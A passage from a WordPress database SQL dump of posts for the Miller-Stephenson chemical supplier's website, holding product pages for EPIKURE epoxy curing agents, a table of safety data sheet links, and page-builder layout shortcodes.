href="https://www.miller-stephenson.com/miller/sds/720L.pdf">MS-720L</a></td>\r\n<td style="text-align: center;">MS-110XB</td>\r\n<td style="text-align: center;">MS-153BN</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">PFPE GREASE SOLUBLE ADDITIVE</td>\r\n<td style="text-align: center;">EPON RESIN 1050</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/725.pdf">MS-725</a></td>\r\n<td style="text-align: center;">MS-1010</td>\r\n<td style="text-align: center;">A0305B</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">PFPE OILS</td>\r\n<td style="text-align: center;">EPON RESIN 1163</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/725.pdf">MS-725M</a></td>\r\n<td style="text-align: center;">MS-2010</td>\r\n<td style="text-align: center;">K1206A</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">TS4 SEALANT</td>\r\n<td style="text-align: center;">EPON RESIN 8021</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/730.pdf">MS-730</a></td>\r\n<td style="text-align: center;">MS-31XXMD</td>\r\n<td style="text-align: center;">Y0717A</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">VACUUM PUMP FLUID</td>\r\n<td style="text-align: center;">EPON RESIN 8132</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/730.pdf">MS-730M</a></td>\r\n<td style="text-align: center;">MS-32XXMD</td>\r\n<td style="text-align: center;">Vydax NRT 960</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">VACUUM PUMP FLUID XP</td>\r\n<td style="text-align: center;">EPON RESIN 8280</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/730L.pdf">MS-730L</a></td>\r\n<td style="text-align: center;">X-P35</td>\r\n<td style="text-align: center;">RA/IPA-5</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-500AF</td>\r\n<td style="text-align: center;">EPON RESIN 8281</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/738.pdf">MS-738</a></td>\r\n<td style="text-align: center;">H0805B</td>\r\n<td style="text-align: center;">RA/IPA-15</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-OILS</td>\r\n<td style="text-align: center;">EPON RESIN 58005</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/738.pdf">MS-738M</a></td>\r\n<td style="text-align: center;">H1112B</td>\r\n<td style="text-align: center;">DryFilm RA/IPA</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-AC, ACX</td>\r\n<td style="text-align: center;">EPON RESIN 58034</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/745.pdf">MS-745</a></td>\r\n<td style="text-align: center;">Vertrel SDG</td>\r\n<td style="text-align: center;">DryFilm RA</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-BD, BDX, BDZ</td>\r\n<td style="text-align: center;">EPONEX 1510</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/750.pdf">MS-750</a></td>\r\n<td style="text-align: center;">Vertrel SFR</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">XHT-S, SX, SZ</td>\r\n<td style="text-align: center;">EPI-REZ WD-510</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/750.pdf">MS-750M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">GPL 2E SERIES</td>\r\n<td style="text-align: center;">EPI-REZ 3522-W-60</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/755.pdf">MS-755</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">PCA,PRO,SG</td>\r\n<td style="text-align: center;">EPI-REZ 5003-W-55</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/755.pdf">MS-755M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPI-REZ 5520-W-60</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/755L.pdf">MS-755L</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPI-REZ 5522-WY-55</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/760.pdf">MS-760</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3015</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/760.pdf">MS-760M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3046</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/765.pdf">MS-765</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3055</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/770.pdf">MS-770</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3115</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/770.pdf">MS-770M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3125</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/775.pdf">MS-775</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3140</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/775.pdf">MS-775M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">EPIKURE 3155</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/780.pdf">MS-780</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3164</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/780.pdf">MS-780M</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3223</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/795.pdf">MS-795</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3234</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/795.pdf">MS-795M</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3245</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/110X.pdf">MS-110X</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3253</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/120X.pdf">MS-120X</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3270</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/120XXP.pdf">MS-120X-XP</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3271</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/H0805A.pdf">H0805A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3274</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/J0912A.pdf">J0912A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3282</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/K0725A.pdf">K0725A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3290</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/miller/sds/K1016A.pdf">K1016A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">EPIKURE 3295</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">CURING AGENT W</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">ANCAMINE K54</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">ANCAMINE K61B</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">BDMA</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">BF3-400</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">DEAPA</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">NMA</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">VERSAMID 115</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;">VERSAMID 125</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">VERSAMID 140</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'SDS', '', 'inherit', 'closed', 'closed', '', '1842-revision-v1', '', '', '2016-09-20 20:03:56', '2016-09-20 20:03:56', '', 1842, 'https://132.148.10.86/wordpress/1842-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1863, 1, '2016-09-21 11:28:14', '2016-09-21 11:28:14', '<p>[product_categories number="10" parent="0" columns="4" title="Miller Stephenson Products"]</p>\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60"]\r\n\r\n<p class="alt-font lead"><strong><em><span class="fancy-underline">INTRODUCING</span></em></strong></p>\r\n[divider]\r\n\r\n<h1><strong>ReleaSys ™ </strong></h1>\r\n<h4 class="thin-font">Semi-Permanent Mold Release</h4>\r\n[button text="TELL ME MORE" style="white alt-button" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]', 'Products', '', 'inherit', 'closed', 'closed', '', '116-revision-v1', '', '', '2016-09-21 11:28:14', '2016-09-21 11:28:14', '', 116, 'https://132.148.10.86/wordpress/116-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1864, 1, '2016-09-21 11:30:58', '2016-09-21 11:30:58', '<p>[product_categories number="8" parent="0" columns="4" title="Miller Stephenson Products"]</p>\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60"]\r\n\r\n<p class="alt-font lead"><strong><em><span class="fancy-underline">INTRODUCING</span></em></strong></p>\r\n[divider]\r\n\r\n<h1><strong>ReleaSys ™ </strong></h1>\r\n<h4 class="thin-font">Semi-Permanent Mold Release</h4>\r\n[button text="TELL ME MORE" style="white alt-button" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]', 'Products', '', 'inherit', 'closed', 'closed', '', '116-revision-v1', '', '', '2016-09-21 11:30:58', '2016-09-21 11:30:58', '', 116, 'https://132.148.10.86/wordpress/116-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1865, 3, '2016-09-23 16:57:04', '2016-09-23 16:57:04', '', 'EPIKURE™ 3253', 'EPIKURE™ Curing Agent 3253, a tertiary amine, is tris (dimethyl amino-methyl) phenol. It is most often used as a co-activating accelerator for other epoxy resin curing agents including polyamides, fatty amidoamines, polysulfides and acid anhydrides. Secondary uses include catalysts for urethane elastomers, isocyanurate foams, epoxy homopolymerization and isocyanate trimerization. Benefits include:\r\n<ul>\r\n 	<li>High reactivity</li>\r\n 	<li>Low viscosity</li>\r\n 	<li>Low vapor pressure</li>\r\n 	<li>Good color</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epikure-3253', '', '', '2016-09-23 17:21:18', '2016-09-23 17:21:18', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1865', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1866, 3, '2016-09-21 12:42:38', '2016-09-21 12:42:38', '', 'EPIKURE™ 3125', 'EPIKURE™ Curing Agent 3125 is a medium viscosity reactive polyamide curing agent, based on dimerized fatty acid and poly-amines. This is a general purpose curing agent for epoxy resins that is suitable for many uses including solvent-borne coatings, potting, adhesives, caulks and grouts. EPIKURE Curing Agent 3125 can be used with a wide range of epoxy resins and can be blended with other amine-based hardeners. Benefits include:\r\n<ul>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>Good water resistance</li>\r\n 	<li>Good toughness and flexibility</li>\r\n 	<li>Good pigment and substrate wetting</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epikure-3125', '', '', '2016-09-21 14:30:59', '2016-09-21 14:30:59', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1866', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1867, 3, '2016-09-21 12:40:44', '2016-09-21 12:40:44', '', '3125', '', 'inherit', 'open', 'closed', '', '3125', '', '', '2016-09-21 12:40:44', '2016-09-21 12:40:44', '', 1866, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/3125.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1868, 3, '2016-09-21 12:49:35', '2016-09-21 12:49:35', 'EPIKURE 3140 Polyamides are one of the most popular types of amine curing agents. Benefits include superior corrosion and water resistance, flexibility and toughness, superior adhesion to metal, good impact resistance, noncritical mix ratios and long pot life. Certain modified polyamides can be used to develop higher solids formulations that offer superior performance.\r\n<p class="Section1"><strong>Application Areas/Suggested Uses: </strong>EPIKURE 3140 Curing agent is used in adhesive applications, as well as in primer, midcoat and topcoat formulations for ships, bridges, industrial equipment, hopper cars, tank trucks, automotive refinishes and industrial flooring. They are also used in putties, sealants and electrical encapsulation.</p>\r\n\r\n<ul>\r\n 	<li>\r\n<div class="Section1">Metal and plastic adhesives</div></li>\r\n 	<li>\r\n<div class="Section1">Highway and bridge deck repairs</div></li>\r\n 	<li>\r\n<div class="Section1">Potting, casting, and encapsulation</div></li>\r\n 	<li>\r\n<div class="Section1">Synthetic flooring systems</div></li>\r\n 	<li>\r\n<div class="Section1">Maintenance coatings</div></li>\r\n 	<li>\r\n<div class="Section1">Tank and pipe linings</div></li>\r\n</ul>\r\n<strong>Benefits</strong>\r\n<ul>\r\n 	<li>\r\n<div>Good chemical and corrosion resistance</div></li>\r\n 	<li>\r\n<div>Good water resistance</div></li>\r\n 	<li>\r\n<div>Good pigment and substrate wetting</div></li>\r\n 	<li>\r\n<div>Good adhesion</div></li>\r\n</ul>\r\n<strong>Specifications</strong>\r\n<table style="height: 228px;" border="1" width="641" cellspacing="0" cellpadding="3">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="211">Property</td>\r\n<td valign="top" width="72">\r\n<p align="center">Units</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">Value</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">Test Method/Standard</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Amine value</td>\r\n<td valign="top" width="72">\r\n<p align="center">mg/g</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">360-390</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D2896</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Viscosity @ 40°C</td>\r\n<td valign="top" width="72">\r\n<p align="center">cP</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">3,000-4,000</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D2196</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Color</td>\r\n<td valign="top" width="72">\r\n<p align="center">Gardner</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">9</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D1544</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211"></td>\r\n<td valign="top" width="72"></td>\r\n<td valign="top" width="132"></td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<strong>Typical Properties</strong>\r\n<table style="height: 380px;" border="1" width="646" cellspacing="0" cellpadding="3">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="211">Property</td>\r\n<td valign="top" width="72">\r\n<p align="center">Units</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">Value</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">Test Method/Standard</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Flash point</td>\r\n<td valign="top" width="72">\r\n<p align="center">°C</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">&gt;110</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D3278</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Density @ 25 °C</td>\r\n<td valign="top" width="72">\r\n<p align="center">lbs/gal</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">8.1</p>\r\n</td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Viscosity @ 25 °C</td>\r\n<td valign="top" width="72">\r\n<p align="center">P</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">130</p>\r\n</td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Appearance</td>\r\n<td valign="top" width="72"></td>\r\n<td colspan="2" valign="top" width="307">Clear and free of foreign particles</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Equivalent weight</td>\r\n<td valign="top" width="72">\r\n<p align="center">approx</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">95</p>\r\n</td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Mix ratio</td>\r\n<td valign="top" width="72"></td>\r\n<td valign="top" width="132"></td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">EEW 190 epoxy</td>\r\n<td valign="top" width="72">\r\n<p align="center">phr</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">50</p>\r\n</td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211"></td>\r\n<td valign="top" width="72"></td>\r\n<td valign="top" width="132"></td>\r\n<td valign="top" width="175"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<p class="Section2"><strong>Safety, Storage &amp; Handling</strong></p>\r\n<p class="Section2">Please refer to the MSDS for the most current Safety and Handling information.</p>\r\n<p class="Section2"> Exposure to these materials should be minimized and avoided, if feasible, through the observance of proper precautions, use of appropriate engineering controls and proper personal protective clothing and equipment, and adherence to proper handling procedures. <b>None of these materials should be used, stored, or transported until the handling precautions and recommendations as stated in the Material Safety Data Sheet (MSDS) for these and all other products being used are understood by all persons who will work with them.</b><a href="https://www.miller-stephenson.com/tech-support/"> Questions and requests for information on Hexion Inc. ("Hexion") products should be directed to your Miller-Stephenson sales representative, </a></p>', 'EPIKURE™ 3140', 'EPIKURE Curing Agent 3140 is a low viscosity reactive polyamide, high imidazoline, moderate molecular weight epoxy curing agent based on dimerized fatty acid and polyamines. Epoxy resin compatibility and thin film curves are very good. Benefits include:\r\n<ul>\r\n 	<li>Good chemical and corrosion resistance</li>\r\n 	<li>Good water resistance</li>\r\n 	<li>Good pigment and substrate wetting</li>\r\n 	<li>Good adhesion</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epikure-3140', '', '', '2016-11-23 19:44:15', '2016-11-23 19:44:15', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1868', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1869, 3, '2016-09-21 12:48:01', '2016-09-21 12:48:01', '', '3140', '', 'inherit', 'open', 'closed', '', '3140', '', '', '2016-09-21 12:48:01', '2016-09-21 12:48:01', '', 1868, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/3140.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (1871, 1, '2016-09-21 13:27:22', '2016-09-21 13:27:22', 'Miller-Stephenson offers a broad range of specialty products to help provides our customers with the solutions they require. Freeze agents for hot/cold intermittence testing of electronic components or reducing tack in prepreg composities. Environmentally-Friendly and Non-flammable Dusters to remove microscopic dust and debris. These are are a few examples of the extensive portfolio of solutions we offer to meet your needs.\r\n\r\nVertrel, Sion™, and Miller-Stephenson SolvSys specialty high-purity fluids and solvents offer robust cleaning agents and carriers to meet your most stringent specifications.  Excellent compatibility with most plastics and rubbers, non-flammable, and high cleaning efficiency are just some of the unique characteristics our fluids and solvents can offer you.\r\n\r\n[product_categories number="2" ids="10,94" columns="4" title="Specialty Products &amp; Solvents"]', 'Specialty Products & Solvents', '', 'publish', 'closed', 'closed', '', 'specialty-products-solvents', '', '', '2016-09-24 15:05:14', '2016-09-24 15:05:14', '', 0, 'https://132.148.10.86/wordpress/?page_id=1871', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (1872, 1, '2016-09-21 13:27:23', '2016-09-21 13:27:23', ' ', '', '', 'publish', 'closed', 'closed', '', '1872', '', '', '2016-09-21 13:27:23', '2016-09-21 13:27:23', '', 0, 'https://132.148.10.86/wordpress/1872/', 7, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (1873, 1, '2016-09-21 13:27:22', '2016-09-21 13:27:22', '&nbsp;\r\n\r\n[product_categories number="2" ids="10,94" columns="4" title="Specialty Products & Solvents"]', 'Specialty Products & Solvents', '', 'inherit', 'closed', 'closed', '', '1871-revision-v1', '', '', '2016-09-21 13:27:22', '2016-09-21 13:27:22', '', 1871, 'https://132.148.10.86/wordpress/1871-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1874, 1, '2016-09-21 13:28:26', '2016-09-21 13:28:26', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n\r\n[/text_box]\r\n[text_box]\r\n\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n\r\n[/text_box]\r\n[text_box position_y="20"]\r\n\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Quality &amp; Service</span></em></h3>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MS-MEDICAL" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY &amp; CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4" align="0"]\r\n\r\n<h3>Technical Support</h3>\r\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n<h3>Application Experts</h3>\r\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n<h3>Large Inventory</h3>\r\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" 